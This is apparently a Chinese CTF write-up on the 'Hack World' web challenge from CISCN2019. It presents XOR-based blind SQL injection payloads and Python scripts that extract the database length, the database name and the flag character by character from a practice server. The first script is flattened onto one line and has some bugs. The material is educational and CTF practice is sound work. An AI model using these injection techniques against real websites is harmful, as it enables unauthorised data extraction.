[CISCN2019 华北赛区 Day2 Web1]Hack World 异或注入小记
0x00:写在前面
异或注入以前碰到的少
今天来记录一下
复现地址:https://buuoj.cn/
0x01:异或注入
0x02:盲注payload
id=(ascii(substr((select(flag)from(flag)),1,1000))>1)^1
import requests url="http://170a957a-daae-4912-8f7e-5452c854f8de.node3.buuoj.cn/index.php" def DBlen():#盲注数据库长度 for i in range(1, 40): # (length(database()) > 1) ^ 1 parm = "(length(database())>" + str(i) + ")^1" data = {'id': parm} req = requests.post(url, data) if ("Hello, glzjin wants a girlfriend." in req.text): return i def DBname(dblen):#盲注数据库名字 #(ascii(substr(database(),2,11))>100)^1 dbname="" for i in range(0,dblen): for j in range(0,300): parm = "(ascii(substr(database(),"+str(i)+","+str(dblen)+"))>"+str(j)+")^1" data = {'id', parm} req = requests.post(url, parm) if ("Hello, glzjin wants a girlfriend." in req.text): dbname+=chr(j) continue return dbname def getflag(): #payload="(ascii(substr((select(flag)from(flag)),1,1000))>102)^1" flag="" for j in range(1,50): for i in range(1, 256): parm = "(ascii(substr((select(flag)from(flag)),%s,1000))>%s)^1" % (str(j), str(i)) data = {'id': parm} req = requests.post(url, data) if ("Hello, glzjin wants a girlfriend." in req.text): flag += chr(i) continue return flag def main(): length=DBlen()#数据库长度 print("数据库长度:"+str(length)) dbname=DBname(length) print("数据库名字:"+dbname) def main1(): print(getflag()) if __name__ == '__main__': main1()
这题用盲注来
ascii:取字符串第一个的字符的ascii
substr:切割(mysql里的substr的start是从1开始),substr的len可以无限大,这个不影响
根据(ascii(substr((select(flag)from(flag)),1,1000))>1)的值来进行异或,这个值为1或者0
再和1进行异或,根据页面回显即可判断出最终flag
import requests
url="http://87ba091d-cbea-4196-98e7-97a83bec2d07.node3.buuoj.cn/index.php"
for q in range(1,100):
for i in range(0, 254):
payload = "1^(SELECT(ASCII(MID((SELECT(CONCAT(flag))FROM(flag))," + str(q) + ",1))=" + str(i) + "))"
data = {"id": payload}
req = requests.post(url, data=data)
if ("Error Occured" in req.text):
print (chr(i),end='')
break
最上面是练习的脚本,这个是直接按照题目提示,直接出flag
